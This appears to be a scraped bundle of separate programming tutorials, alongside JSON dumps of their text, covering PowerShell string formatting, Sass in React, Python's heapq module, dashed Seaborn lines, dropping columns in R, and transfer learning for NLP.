[ { "code": null, "e": 1173, "s": 1062, "text": "To format a string in a PowerShell we can use various methods. First using the simple expanding string method." }, { "code": null, "e": 1262, "s": 1173, "text": "PS C:\\> $str = 'PowerShell'\nPS C:\\> Write-Output \"Hello $str !!!!\"\nHello PowerShell !!!!" }, { "code": null, "e": 1369, "s": 1262, "text": "Second, using the format method. In this method, we will use the Format function of the String .NET class." }, { "code": null, "e": 1465, "s": 1369, "text": "PS C:\\> $str = \"PowerShell\"\nPS C:\\> [String]::Format(\"Hello $str...!!!\")\nHello PowerShell...!!!" }, { "code": null, "e": 1559, "s": 1465, "text": "The third method using the Format operator. We can use the number format here as shown below." }, { "code": null, "e": 1632, "s": 1559, "text": "PS C:\\> $str = 'PowerShell'\nPS C:\\> \"Hello {0}\" -f $str\nHello PowerShell" }, { "code": null, "e": 1739, "s": 1632, "text": "If we have multiple variables then we need to increase the numbers inside the curly brackets. For example," }, { "code": null, "e": 1860, "s": 1739, "text": "PS C:\\> $str = \"PowerShell\"\nPS C:\\> $str1 = \"Azure\"\nPS C:\\> \"Hello {0} and {1}\" -f $str,$str1\nHello PowerShell and Azure" }, { "code": null, "e": 1928, "s": 1860, "text": "You can also use the same format operator inside the format method." }, { "code": null, "e": 2013, "s": 1928, "text": "PS C:\\> [String]::Format(\"Hello {0} and {1}\", $str,$str1)\nHello PowerShell and Azure" } ]
React Sass Styling
Sass is a CSS pre-processor.

Sass files are compiled into regular CSS before they reach the browser, which receives plain CSS.

You can learn more about Sass in our Sass Tutorial.

If you use create-react-app in your project, you can easily install and use Sass in your React projects.

Install Sass by running this command in your terminal (the command below assumes an npm-based setup):

npm install sass

Now you are ready to include Sass files in your project!

Create a Sass file the same way as you create CSS files, but Sass files have the file extension .scss

In Sass files you can use variables and other Sass functions:

Create a variable to define the color of the text:

$myColor: red;

h1 {
  color: $myColor;
}

Import the Sass file the same way as you imported a CSS file:

import React from 'react';
import ReactDOM from 'react-dom/client';
import './my-sass.scss';

const Header = () => {
  return (
    <>
      <h1>Hello Style!</h1>
      <p>Add a little style!</p>
    </>
  );
}

const root = ReactDOM.createRoot(document.getElementById('root'));
root.render(<Header />);
[ { "code": null, "e": 29, "s": 0, "text": "Sass is a CSS pre-processor." }, { "code": null, "e": 98, "s": 29, "text": "Sass files are executed on the server and sends CSS to the \nbrowser." }, { "code": null, "e": 150, "s": 98, "text": "You can learn more about Sass in our\nSass Tutorial." }, { "code": null, "e": 260, "s": 150, "text": "If you use the create-react-app in your project, you can easily \ninstall and use Sass in your React projects." }, { "code": null, "e": 315, "s": 260, "text": "Install Sass by running this command in your terminal:" }, { "code": null, "e": 372, "s": 315, "text": "Now you are ready to include Sass files in your project!" }, { "code": null, "e": 475, "s": 372, "text": "Create a Sass file the same way as you create CSS files, but Sass files have the \nfile extension .scss" }, { "code": null, "e": 537, "s": 475, "text": "In Sass files you can use variables and other Sass functions:" }, { "code": null, "e": 588, "s": 537, "text": "Create a variable to define the color of the text:" }, { "code": null, "e": 630, "s": 588, "text": "$myColor: red;\n\nh1 {\n color: $myColor;\n}" }, { "code": null, "e": 692, "s": 630, "text": "Import the Sass file the same way as you imported a CSS file:" }, { "code": null, "e": 1000, "s": 692, "text": "import React from 'react';\nimport ReactDOM from 'react-dom/client';\nimport './my-sass.scss';\n\nconst Header = () => {\n return (\n <>\n <h1>Hello Style!</h1>\n <p>Add a little style!.</p>\n </>\n );\n}\n\nconst root = ReactDOM.createRoot(document.getElementById('root'));\nroot.render(<Header />);\n \n" }, { "code": null, "e": 1017, "s": 1000, "text": "\nRun \nExample »\n" }, { "code": null, "e": 1050, "s": 1017, "text": "We just launchedW3Schools videos" }, { "code": null, "e": 1092, "s": 1050, "text": "Get certifiedby completinga course today!" }, { "code": null, "e": 1199, "s": 1092, "text": "If you want to report an error, or if you want to make a suggestion, do not hesitate to send us an e-mail:" }, { "code": null, "e": 1218, "s": 1199, "text": "[email protected]" } ]
Introduction to Python Heapq Module | by Vijini Mallawaarachchi | Towards Data Science
A Heap is a special case of a binary tree where the parent nodes are compared to their children by value and arranged accordingly. If you have come across my previous article, 8 Common Data Structures every Programmer must know, you will know that there are two types of heaps: min heap and max heap.

The heapq module of Python implements the heap queue algorithm. It uses a min heap, where the key of the parent is less than or equal to those of its children. In this article, I will introduce the Python heapq module and walk you through some examples of how to use heapq with primitive data types and objects with complex data.

Assuming that you know how the heap data structure works, let's see what functions are provided by Python's heapq module.

heappush(heap, item) — Push the value item into the heap
heappop(heap) — Pop and return the smallest value from the heap
heappushpop(heap, item) — Push the value item into the heap and return the smallest value from the heap
heapify(x) — Convert the list x into a heap
heapreplace(heap, item) — Pop and return the smallest value from the heap, then push the value item into the heap

Let's see some examples where we use different heapq functions. First of all, you have to import the heapq module.

import heapq

Consider the example list a as given below.

>>> a = [52, 94, 13, 77, 41]

If we heapify this list, the result will be as follows. Note that heapifying is done in-place.

>>> heapq.heapify(a)
>>> print(a)
[13, 41, 52, 77, 94]

Note that the 0th index contains the smallest value out of all the values, which is 13.

Let's push the value 10 to our heap.

>>> heapq.heappush(a,10)
>>> print(a)
[10, 41, 13, 77, 94, 52]

Note that 10 is added, and since 10 is the smallest value out of the available values, it is at the 0th index.

Now let's pop from our heap.

>>> print(heapq.heappop(a))
10
>>> print(a)
[13, 41, 52, 77, 94]

When we pop from our heap, it will remove the smallest value from the heap and return it. Now the value 10 is no longer in our heap.

Let's see how the heappushpop() function works. Let's heappushpop the value 28.

>>> print(heapq.heappushpop(a,28))
13
>>> print(a)
[28, 41, 52, 77, 94]

You can see that 28 is pushed to the heap and the smallest value 13 is popped from the heap.

Now let's try the heapreplace() function. Let's heapreplace the value 3 into the heap.

>>> print(heapq.heapreplace(a,3))
28
>>> print(a)
[3, 41, 52, 77, 94]

You can see that the initially smallest value 28 is popped first, and then our new value 3 is pushed. The 0th index in the new heap holds the value 3. Note the difference in the order of push and pop actions between the heappushpop() and heapreplace() functions.

In the previous example, I have explained how to use heapq functions with primitive data types such as integers. Similarly, we can use objects with heapq functions to order complex data such as tuples or even strings. For this, we need a wrapper class suited to our scenario. Consider a case where you want to store strings and order them by the length of the strings, shortest to longest. Our wrapper class will look as follows.

class DataWrap:
    def __init__(self, data):
        self.data = data

    def __lt__(self, other):
        return len(self.data) < len(other.data)

The __lt__ function (the rich-comparison method Python calls for the < operator) will contain the logic to compare the lengths of strings. Now let's try to make a heap with some strings.
# Create list of strings
my_strings = ["write", "go", "run", "come"]

# Initialising
sorted_strings = []

# Wrap strings and push to heap
for s in my_strings:
    heapObj = DataWrap(s)
    heapq.heappush(sorted_strings, heapObj)

# Print the heap
for myObj in sorted_strings:
    print(myObj.data, end="\t")

The output from printing items from the heap will be as follows.

go	come	run	write

Note that the shortest word go is in the front of the heap. Now you can try out other heapq functions by wrapping strings.

We can easily implement a max heap using heapq. All you have to do is change the comparison operator in the __lt__ function to order the largest value to the front. Let's try the previous example with strings and their lengths.

class DataWrap:
    def __init__(self, data):
        self.data = data

    def __lt__(self, other):
        return len(self.data) > len(other.data)

# Create list of strings
my_strings = ["write", "go", "run", "come"]

# Initialising
sorted_strings = []

# Wrap strings and push to heap
for s in my_strings:
    heapObj = DataWrap(s)
    heapq.heappush(sorted_strings, heapObj)

# Print the heap
for myObj in sorted_strings:
    print(myObj.data, end="\t")

Note how the length comparison has changed in the __lt__ function of the DataWrap class. The output from printing items from this heap will be as follows.

write	come	run	go

Note that now the longest word write is in the front of the heap. A simpler alternative for plain numbers is sketched below, after the closing remarks.

I hope you found this article informative and useful during implementations with the heapq module. Please feel free to play around with the code provided.

Thank you for reading!

Cheers!
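As promised above, here is an alternative sketch. It is not from the original article: for plain numeric values (the list below reuses the article's earlier example values), a max heap is commonly simulated by negating values on the way in and out, which avoids writing a wrapper class:

import heapq

numbers = [52, 94, 13, 77, 41]

# Push negated values so the "smallest" item is really the largest
max_heap = []
for n in numbers:
    heapq.heappush(max_heap, -n)

# Negate again when popping to recover the original value
largest = -heapq.heappop(max_heap)
print(largest)  # 94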
[ { "code": null, "e": 476, "s": 171, "text": "A Heap is a special case of a binary tree where the parent nodes are compared to their children with their values and are arranged accordingly. If you have come across my previous article titled 8 Common Data Structures every Programmer must know that there are two types of heaps; min heap and max heap." }, { "code": null, "e": 499, "s": 476, "text": "towardsdatascience.com" }, { "code": null, "e": 830, "s": 499, "text": "The heapq module of python implements the heap queue algorithm. It uses the min heap where the key of the parent is less than or equal to those of its children. In this article, I will introduce the python heapq module and walk you through some examples of how to use heapq with primitive data types and objects with complex data." }, { "code": null, "e": 951, "s": 830, "text": "Assuming that you know how the heap data structure works, let’s see what functions are provided by Python’s heapq model." }, { "code": null, "e": 1008, "s": 951, "text": "heappush(heap, item) — Push the value item into the heap" }, { "code": null, "e": 1072, "s": 1008, "text": "heappop(heap) — Pop and return the smallest value from the heap" }, { "code": null, "e": 1176, "s": 1072, "text": "heappushpop(heap, item) — Push the value item into the heap and return the smallest value from the heap" }, { "code": null, "e": 1220, "s": 1176, "text": "heapify(x) — Convert the list x into a heap" }, { "code": null, "e": 1333, "s": 1220, "text": "heapreplace(heap, item) — Pop and return the smallest value from the heap then push the value item into the heap" }, { "code": null, "e": 1448, "s": 1333, "text": "Let’s see some examples where we use different heapq functions. First of all, you have to import the heapq module." }, { "code": null, "e": 1461, "s": 1448, "text": "import heapq" }, { "code": null, "e": 1505, "s": 1461, "text": "Consider the example list a as given below." }, { "code": null, "e": 1534, "s": 1505, "text": ">>> a = [52, 94, 13, 77, 41]" }, { "code": null, "e": 1629, "s": 1534, "text": "If we heapify this list, the result will be as follows. Note that heapifying is done in-place." }, { "code": null, "e": 1682, "s": 1629, "text": ">>> heapq.heapify(a)>>> print(a)[13, 41, 52, 77, 94]" }, { "code": null, "e": 1770, "s": 1682, "text": "Note that the 0th index contains the smallest value out of all the values, which is 13." }, { "code": null, "e": 1807, "s": 1770, "text": "Let’s push the value 10 to our heap." }, { "code": null, "e": 1868, "s": 1807, "text": ">>> heapq.heappush(a,10)>>> print(a)[10, 41, 13, 77, 94, 52]" }, { "code": null, "e": 1978, "s": 1868, "text": "Note that 10 is added and since 10 is the smallest value out of the available values, it is in the 0th index." }, { "code": null, "e": 2007, "s": 1978, "text": "Now let’s pop from our heap." }, { "code": null, "e": 2069, "s": 2007, "text": ">>> print(heapq.heappop(a))10>>> print(a)[13, 41, 52, 77, 94]" }, { "code": null, "e": 2202, "s": 2069, "text": "When we pop from our heap, it will remove the smallest value from the heap and return it. Now the value 10 is no longer in our heap." }, { "code": null, "e": 2283, "s": 2202, "text": "Let’s see how the heappushpop() functions works. Let’s heappushpop the value 28." }, { "code": null, "e": 2352, "s": 2283, "text": ">>> print(heapq.heappushpop(a,28))13>>> print(a)[28, 41, 52, 77, 94]" }, { "code": null, "e": 2445, "s": 2352, "text": "You can see that 28 is pushed to the heap and the smallest value 13 is popped from the heap." 
}, { "code": null, "e": 2533, "s": 2445, "text": "Now let’s try the heapreplace() function. Let’s heapreplace the value 3 in to the heap." }, { "code": null, "e": 2600, "s": 2533, "text": ">>> print(heapq.heapreplace(a,3))28>>> print(a)[3, 41, 52, 77, 94]" }, { "code": null, "e": 2837, "s": 2600, "text": "You can see that the initially smallest value 28 is popped and then our new value 3 is pushed. The 0th index in the new heap value 3. Note the difference in the order of push and pop actions in heappushpop() and heapreplace() functions." }, { "code": null, "e": 3278, "s": 2837, "text": "In the previous example, I have explained how to use heapq functions with primitive data types such as integers. Similarly, we can use objects with heapq functions to order complex data such as tuples or even strings. For this, we need to have a wrapper class according to our scenario. Consider a case where you want to store strings and order them by the length of the strings, shortest to longest. Our wrapper class will look as follows." }, { "code": null, "e": 3432, "s": 3278, "text": "class DataWrap: def __init__(self, data): self.data = data def __lt__(self, other): return len(self.data) < len(other.data)" }, { "code": null, "e": 3644, "s": 3432, "text": "The __lt__ function (it is the operator overloading function for comparison operators; >, ≥, ==, < and ≤) will contain the logic to compare the lengths of strings. Now let’s try to make a heap with some strings." }, { "code": null, "e": 3939, "s": 3644, "text": "# Create list of stringsmy_strings = [\"write\", \"go\", \"run\", \"come\"]# Initialisingsorted_strings = []# Wrap strings and push to heapfor s in my_strings: heapObj = DataWrap(s) heapq.heappush(sorted_strings, heapObj)# Print the heapfor myObj in sorted_strings: print(myObj.data, end=\"\\t\")" }, { "code": null, "e": 4004, "s": 3939, "text": "The output from printing items from the heap will be as follows." }, { "code": null, "e": 4022, "s": 4004, "text": "go\tcome\trun\twrite" }, { "code": null, "e": 4145, "s": 4022, "text": "Note that the shortest word go is in the front of the heap. Now you can try out other heapq functions by wrapping strings." }, { "code": null, "e": 4373, "s": 4145, "text": "We can easily implement a max heap using heapq. All you have to do it change the comparison operator in the __lt__ function to order the largest value to the front. Let’s try the previous example with strings and their lengths." }, { "code": null, "e": 4821, "s": 4373, "text": "class DataWrap: def __init__(self, data): self.data = data def __lt__(self, other): return len(self.data) > len(other.data)# Create list of stringsmy_strings = [\"write\", \"go\", \"run\", \"come\"]# Initialisingsorted_strings = []# Wrap strings and push to heapfor s in my_strings: heapObj = DataWrap(s) heapq.heappush(sorted_strings, heapObj)# Print the heapfor myObj in sorted_strings: print(myObj.data, end=\"\\t\")" }, { "code": null, "e": 4976, "s": 4821, "text": "Note how the length comparison has changed in the __lt__ function of the DataWrap class. The output from printing items from this heap will be as follows." }, { "code": null, "e": 4994, "s": 4976, "text": "write\tcome\trun\tgo" }, { "code": null, "e": 5060, "s": 4994, "text": "Note that now the longest word write is in the front of the heap." }, { "code": null, "e": 5215, "s": 5060, "text": "I hope you found this article informative and useful during implementations with the heapq module. Please feel free to play around with the code provided." 
}, { "code": null, "e": 5238, "s": 5215, "text": "Thank you for reading!" }, { "code": null, "e": 5246, "s": 5238, "text": "Cheers!" } ]
How to plot a dashed line on a Seaborn lineplot in Matplotlib?
To plot a dashed line on a Seaborn lineplot, we can use linestyle="dashed" in the argument of lineplot().

Set the figure size and adjust the padding between and around the subplots.
Create x and y data points using numpy.
Use the lineplot() method with the x and y data points in the argument and linestyle="dashed".
To display the figure, use the show() method.

import seaborn as sns
import numpy as np
from matplotlib import pyplot as plt

plt.rcParams["figure.figsize"] = [7.50, 3.50]
plt.rcParams["figure.autolayout"] = True

x = np.random.rand(10)
y = np.random.rand(10)

ax = sns.lineplot(x=x, y=y, linestyle="dashed")

plt.show()
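As a small extension not covered in the original post: the linestyle keyword is forwarded to Matplotlib, which (per its line-style conventions) also accepts a custom dash pattern as an (offset, on-off sequence) tuple instead of the named "dashed" style. A hedged sketch:

import seaborn as sns
import numpy as np
from matplotlib import pyplot as plt

plt.rcParams["figure.figsize"] = [7.50, 3.50]
plt.rcParams["figure.autolayout"] = True

x = np.random.rand(10)
y = np.random.rand(10)

# (0, (5, 2)) means: no offset, 5-point dashes separated by 2-point gaps
ax = sns.lineplot(x=x, y=y, linestyle=(0, (5, 2)))

plt.show()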
[ { "code": null, "e": 1168, "s": 1062, "text": "To plot a dashed line on a Seaborn lineplot, we can use linestyle=\"dashed\" in the argument of lineplot()." }, { "code": null, "e": 1244, "s": 1168, "text": "Set the figure size and adjust the padding between and around the subplots." }, { "code": null, "e": 1320, "s": 1244, "text": "Set the figure size and adjust the padding between and around the subplots." }, { "code": null, "e": 1360, "s": 1320, "text": "Create x and y data points using numpy." }, { "code": null, "e": 1400, "s": 1360, "text": "Create x and y data points using numpy." }, { "code": null, "e": 1487, "s": 1400, "text": "Use lineplot() method with x and y data points in the argument and linestyle=\"dashed\"." }, { "code": null, "e": 1574, "s": 1487, "text": "Use lineplot() method with x and y data points in the argument and linestyle=\"dashed\"." }, { "code": null, "e": 1616, "s": 1574, "text": "To display the figure, use show() method." }, { "code": null, "e": 1658, "s": 1616, "text": "To display the figure, use show() method." }, { "code": null, "e": 1928, "s": 1658, "text": "import seaborn as sns\nimport numpy as np\nfrom matplotlib import pyplot as plt\nplt.rcParams[\"figure.figsize\"] = [7.50, 3.50]\nplt.rcParams[\"figure.autolayout\"] = True\nx = np.random.rand(10)\ny = np.random.rand(10)\nax = sns.lineplot(x=x, y=y, linestyle=\"dashed\")\nplt.show()" } ]
Drop column(s) by name from a given DataFrame in R - GeeksforGeeks
26 Mar, 2021

Dropping columns from a data frame simply removes unwanted columns from it. In this article, we will discuss three different approaches to dropping columns by name from a given data frame in R. The approaches are discussed below.

Method 1: Using subset()

One of the easiest approaches to dropping columns is the subset() function with the '-' sign, which indicates dropping variables. This function in the R language is used to create subsets of a data frame and can also be used to drop columns from a data frame.

Syntax:

subset(df, expr)

Parameters:

df: Data frame used
expr: Condition for a subset

Approach

Create data frame
Select subset of the data to be removed
Put a minus sign
Assign to initial data frame
Display data frame

Example:

R

gfg <- data.frame(a=c('i','ii','iii','iv','v'),
                  x=c('I','II','III','IV','V'),
                  y=c(1,2,3,4,5),
                  z=c('a','b','c','d','e'))

print('Original dataframe:-')
gfg

gfg = subset(gfg, select = -c(x,z))
print('Modified dataframe:-')
gfg

Output:

Method 2: Using names() with %in%

In this method, we create a character vector named drop in which we store the column names, and we then tell R to select all the variables except the column names specified in the vector drop. The '!' sign indicates negation.

The names() function in the R language is used to get or set the names of an object. It takes the object (vector, matrix, or data frame) as an argument, along with the value to be assigned as names. The length of the value vector passed must be exactly equal to the length of the object to be named, and names() returns all the column names.

Syntax:

names(x) <- value

Parameters:

x: Object, i.e. vector, matrix, data frame, etc.
value: Names to be assigned to x

Approach

Create data frame
Select columns to be deleted
Apply negation
Assign it to the initial data frame
Display data frame

Example:

R

gfg <- data.frame(a=c('i','ii','iii','iv','v'),
                  x=c('I','II','III','IV','V'),
                  y=c(1,2,3,4,5),
                  z=c('a','b','c','d','e'))

print('Original dataframe:-')
gfg

drop <- c("x","z")

gfg = gfg[,!(names(gfg) %in% drop)]
print('Modified dataframe:-')
gfg

Output:

Method 3: Using dplyr's select()

In this approach, we import the dplyr library in R and use select(), specifying the columns to drop with a minus sign. Basically, this function keeps only the variables you mention.

Syntax:

select(.data, ...)

Parameters:

data: A data frame, data frame extension, or a lazy data frame.
... : One or more unquoted expressions separated by commas. Variable names can be used as if they were positions in the data frame, so expressions like x:y can be used to select a range of variables.

Approach

Import module
Create data frame
Select column to be removed
Apply minus sign
Assign it to the initial data frame
Display data frame

Example:

R

library(dplyr)

gfg <- data.frame(a=c('i','ii','iii','iv','v'),
                  x=c('I','II','III','IV','V'),
                  y=c(1,2,3,4,5),
                  z=c('a','b','c','d','e'))

print('Original dataframe:-')
gfg

print('Modified dataframe:-')
select(gfg, -a)

Output:
[ { "code": null, "e": 25242, "s": 25214, "text": "\n26 Mar, 2021" }, { "code": null, "e": 25467, "s": 25242, "text": "Dropping of columns from a data frame is simply used to remove the unwanted columns in the data frame. In this article, we will be discussing the two different approaches to drop columns by name from a given Data Frame in R." }, { "code": null, "e": 25572, "s": 25467, "text": "The different approaches to drop columns by the name from a data frame is R language are discussed below" }, { "code": null, "e": 25840, "s": 25572, "text": "This is one of the easiest approaches to drop columns is by using the subset() function with the ‘-‘ sign which indicates dropping variables. This function in R Language is used to create subsets of a Data frame and can also be used to drop columns from a data frame." }, { "code": null, "e": 25851, "s": 25840, "text": " Syntax: " }, { "code": null, "e": 25868, "s": 25851, "text": "subset(df, expr)" }, { "code": null, "e": 25882, "s": 25868, "text": " Parameters:" }, { "code": null, "e": 25902, "s": 25882, "text": "df: Data frame used" }, { "code": null, "e": 25931, "s": 25902, "text": "expr: Condition for a subset" }, { "code": null, "e": 25940, "s": 25931, "text": "Approach" }, { "code": null, "e": 25958, "s": 25940, "text": "Create data frame" }, { "code": null, "e": 25998, "s": 25958, "text": "Select subset of the data to be removed" }, { "code": null, "e": 26015, "s": 25998, "text": "Put a minus sign" }, { "code": null, "e": 26044, "s": 26015, "text": "Assign to initial data frame" }, { "code": null, "e": 26063, "s": 26044, "text": "Display data frame" }, { "code": null, "e": 26072, "s": 26063, "text": "Example:" }, { "code": null, "e": 26074, "s": 26072, "text": "R" }, { "code": "gfg <- data.frame(a=c('i','ii','iii','iv','v'), x=c('I','II','III','IV','V'), y=c(1,2,3,4,5), z=c('a','b','c','d','e')) print('Original dataframe:-')gfg gfg = subset(gfg, select = -c(x,z) )print('Modified dataframe:-')gfg", "e": 26351, "s": 26074, "text": null }, { "code": null, "e": 26359, "s": 26351, "text": "Output:" }, { "code": null, "e": 26598, "s": 26359, "text": "In this method, we are creating a character vector named drop in which we are storing column names Later we are telling R to select all the variables except the column names specified in the vector drop. The ‘!’ sign indicates negation. " }, { "code": null, "e": 26960, "s": 26598, "text": "The function names() in R Language are used to get or set the name of an Object. This function takes the object i.e. vector, matrix, or data frame as an argument along with the value that is to be assigned a name to the object. The length of the value vector passed must be exactly equal to the length of the object to be named and returns all the column names." }, { "code": null, "e": 26974, "s": 26960, "text": " Syntax: " }, { "code": null, "e": 26992, "s": 26974, "text": "names(x) <- value" }, { "code": null, "e": 27006, "s": 26992, "text": " Parameters:" }, { "code": null, "e": 27054, "s": 27006, "text": "x: Object i.e. vector, matrix, data frame, etc." 
}, { "code": null, "e": 27087, "s": 27054, "text": "value: Names to be assigned to x" }, { "code": null, "e": 27096, "s": 27087, "text": "Approach" }, { "code": null, "e": 27114, "s": 27096, "text": "Create data frame" }, { "code": null, "e": 27143, "s": 27114, "text": "Select columns to be deleted" }, { "code": null, "e": 27158, "s": 27143, "text": "Apply negation" }, { "code": null, "e": 27194, "s": 27158, "text": "Assign it to the initial data frame" }, { "code": null, "e": 27213, "s": 27194, "text": "Display data frame" }, { "code": null, "e": 27222, "s": 27213, "text": "Example:" }, { "code": null, "e": 27224, "s": 27222, "text": "R" }, { "code": "gfg <- data.frame(a=c('i','ii','iii','iv','v'), x=c('I','II','III','IV','V'), y=c(1,2,3,4,5), z=c('a','b','c','d','e')) print('Original dataframe:-')gfg drop <- c(\"x\",\"z\") gfg = gfg[,!(names(gfg) %in% drop)]print('Modified dataframe:-')gfg", "e": 27518, "s": 27224, "text": null }, { "code": null, "e": 27526, "s": 27518, "text": "Output:" }, { "code": null, "e": 27744, "s": 27526, "text": "In this approach, we will be using select() by the import the dplyr library in R language and specifying the parameter to drop the columns of the dataset. Basically, this function keeps only the variables you mention." }, { "code": null, "e": 27753, "s": 27744, "text": "Syntax:-" }, { "code": null, "e": 27772, "s": 27753, "text": "select(.data, ...)" }, { "code": null, "e": 27785, "s": 27772, "text": "Parameters:-" }, { "code": null, "e": 27849, "s": 27785, "text": "data:-A data frame, data frame extension, or a lazy data frame." }, { "code": null, "e": 28050, "s": 27849, "text": "... :- One or more unquoted expressions separated by commas. Variable names can be used as if they were positions in the data frame, so expressions like x:y can be used to select a range of variables." }, { "code": null, "e": 28059, "s": 28050, "text": "Approach" }, { "code": null, "e": 28073, "s": 28059, "text": "Import module" }, { "code": null, "e": 28091, "s": 28073, "text": "Create data frame" }, { "code": null, "e": 28119, "s": 28091, "text": "Select column to be removed" }, { "code": null, "e": 28136, "s": 28119, "text": "Apply minus sign" }, { "code": null, "e": 28172, "s": 28136, "text": "Assign it to the initial data frame" }, { "code": null, "e": 28191, "s": 28172, "text": "Display data frame" }, { "code": null, "e": 28201, "s": 28191, "text": "Example:-" }, { "code": null, "e": 28203, "s": 28201, "text": "R" }, { "code": "library(dplyr) gfg <- data.frame(a=c('i','ii','iii','iv','v'), x=c('I','II','III','IV','V'), y=c(1,2,3,4,5), z=c('a','b','c','d','e')) print('Original dataframe:-')gfg print('Modified dataframe:-')select(gfg, -a)", "e": 28472, "s": 28203, "text": null }, { "code": null, "e": 28481, "s": 28472, "text": "Output:-" }, { "code": null, "e": 28488, "s": 28481, "text": "Picked" }, { "code": null, "e": 28509, "s": 28488, "text": "R DataFrame-Programs" }, { "code": null, "e": 28521, "s": 28509, "text": "R-DataFrame" }, { "code": null, "e": 28532, "s": 28521, "text": "R Language" }, { "code": null, "e": 28543, "s": 28532, "text": "R Programs" }, { "code": null, "e": 28641, "s": 28543, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 28693, "s": 28641, "text": "Change Color of Bars in Barchart using ggplot2 in R" }, { "code": null, "e": 28731, "s": 28693, "text": "How to Change Axis Scales in R Plots?" 
}, { "code": null, "e": 28766, "s": 28731, "text": "Group by function in R using Dplyr" }, { "code": null, "e": 28824, "s": 28766, "text": "How to Split Column Into Multiple Columns in R DataFrame?" }, { "code": null, "e": 28873, "s": 28824, "text": "How to filter R DataFrame by values in a column?" }, { "code": null, "e": 28931, "s": 28873, "text": "How to Split Column Into Multiple Columns in R DataFrame?" }, { "code": null, "e": 28980, "s": 28931, "text": "How to filter R DataFrame by values in a column?" }, { "code": null, "e": 29030, "s": 28980, "text": "How to filter R dataframe by multiple conditions?" }, { "code": null, "e": 29073, "s": 29030, "text": "Replace Specific Characters in String in R" } ]
3 Pre-Trained Model Series to Use for NLP with Transfer Learning | by Orhan G. Yalçın | Towards Data Science
Before we start, if you are reading this article, I am sure that we share similar interests and are/will be in similar industries. So let's connect via Linkedin! Please do not hesitate to send a contact request! Orhan G. Yalçın — Linkedin

If you have been trying to build machine learning models with high accuracy but have never tried transfer learning, this article will change your life. At least, it did mine!

Note that this post is also a follow-up to a post on transfer learning for computer vision tasks. It has started to gain popularity, and now I wanted to share the NLP version of that with you. But, just in case, check it out: towardsdatascience.com

Most of us have already tried several machine learning tutorials to grasp the basics of neural networks. These tutorials helped us understand the basics of artificial neural networks such as recurrent neural networks, convolutional neural networks, GANs, and autoencoders. But their main functionality was to prepare you for real-world implementations.

Now, if you are planning to build an AI system that utilizes deep learning, you have to either

have deep pockets for training and excellent AI researchers at your disposal*; or
benefit from transfer learning.

* According to BD Tech Talks, the training cost of OpenAI's GPT-3 exceeded US $4.6 million.

Transfer learning is a subfield of machine learning and artificial intelligence which aims to apply the knowledge gained from one task (the source task) to a different but similar task (the target task). In other words:

Transfer learning is the improvement of learning in a new task through the transfer of knowledge from a related task that has already been learned.

For example, the knowledge gained while learning to classify Wikipedia texts can help tackle legal text classification problems. Another example would be using the knowledge gained while learning to classify cars to recognize the birds in the sky. As you can see, there is a relation between these examples. We are not using a text classification model on bird detection.

In summary, transfer learning saves us from reinventing the wheel, meaning we don't waste time doing the things that have already been done by a major company. Thanks to transfer learning, we can build AI applications in a very short amount of time.

The history of transfer learning dates back to 1993. With her paper Discriminability-Based Transfer between Neural Networks, Lorien Pratt opened Pandora's box and introduced the world to the potential of transfer learning. In July 1997, the journal Machine Learning published a special issue for transfer learning papers. As the field advanced, adjacent topics such as multi-task learning were also included under the field of transfer learning. Learning to Learn is one of the pioneer books in this field. Today, transfer learning is a powerful source for tech entrepreneurs to build new AI solutions and for researchers to push machine learning frontiers.

To show the power of transfer learning, we can quote from Andrew Ng:

Transfer learning will be the next driver of machine learning's commercial success after supervised learning.

There are three requirements to achieve transfer learning:

Development of an Open Source Pre-trained Model by a Third Party
Repurposing the Model
Fine Tuning for the Problem

A pre-trained model is a model created and trained by someone else to solve a similar problem. In practice, that someone is almost always a tech giant or a group of star researchers. They usually choose a very large dataset as their base dataset, such as ImageNet or the Wikipedia Corpus. Then, they create a large neural network (e.g., VGG19 has 143,667,240 parameters) to solve a particular problem (e.g., for VGG19 this problem is image classification). Of course, this pre-trained model must be made public so that we can take it and repurpose it.

After getting our hands on these pre-trained models, we repurpose the learned knowledge, which includes the layers, features, weights, and biases. There are several ways to load a pre-trained model into our environment. In the end, it is just a file/folder which contains the relevant information. Deep learning libraries already host many of these pre-trained models, which makes them more accessible and convenient:

TensorFlow Hub
PyTorch Hub
Hugging Face

You can use one of the sources above to load a trained model. It will usually come with all the layers and weights, and you can edit the network as you wish. Additionally, some research labs maintain their own repos, as you will see for ELMo later in this post.
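As a quick, concrete illustration of how little code "repurposing" can take, here is a minimal Python sketch using Hugging Face's transformers library. The task and input sentence are illustrative assumptions, not part of the original post; pipeline() downloads a default pre-trained model for the task behind the scenes:

from transformers import pipeline

# Downloads a default pre-trained sentiment model and its tokenizer.
classifier = pipeline("sentiment-analysis")

# The transferred knowledge is immediately reusable on our own inputs.
print(classifier("Transfer learning saves us from reinventing the wheel."))
# e.g. [{'label': 'POSITIVE', 'score': 0.99...}]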
Well, while the current model may work for our problem, it is often better to fine-tune the pre-trained model, for two reasons:

So that we can achieve even higher accuracy;
So that our fine-tuned model can generate the output in the correct format.

Generally speaking, in a neural network, while the bottom and mid-level layers usually represent general features, the top layers represent problem-specific features. Since our new problem is different from the original problem, we tend to drop the top layers. By adding layers specific to our problem, we can achieve higher accuracy.

After dropping the top layers, we need to place our own layers so that we can get the output we want. For example, a model trained with English Wikipedia such as BERT can be customized by adding additional layers and further trained with the IMDB Reviews dataset to predict movie review sentiments.

After adding our custom layers to the pre-trained model, we can configure it with special loss functions and optimizers and fine-tune it with extra training.
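To make this drop-the-top-and-fine-tune workflow concrete, here is a minimal Python/Keras sketch. The TensorFlow Hub module URL, the layer sizes, and the train_data variable are illustrative assumptions (a common pattern, not a prescribed recipe): a pre-trained text embedding acts as the frozen transferred base, and new task-specific layers are stacked on top for a binary task such as IMDB sentiment.

import tensorflow as tf
import tensorflow_hub as hub

# Transferred knowledge: a pre-trained text-embedding module from TensorFlow Hub.
base = hub.KerasLayer("https://tfhub.dev/google/nnlm-en-dim50/2",
                      input_shape=[], dtype=tf.string,
                      trainable=False)  # freeze the transferred layers

# New problem-specific top layers, e.g. for IMDB review sentiment.
model = tf.keras.Sequential([
    base,
    tf.keras.layers.Dense(16, activation="relu"),
    tf.keras.layers.Dense(1, activation="sigmoid"),  # positive / negative
])

model.compile(optimizer="adam",
              loss="binary_crossentropy",
              metrics=["accuracy"])

# model.fit(train_data, epochs=5)  # fine-tune on the target task's data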
For a quick transfer learning tutorial, you may visit the post below: towardsdatascience.com

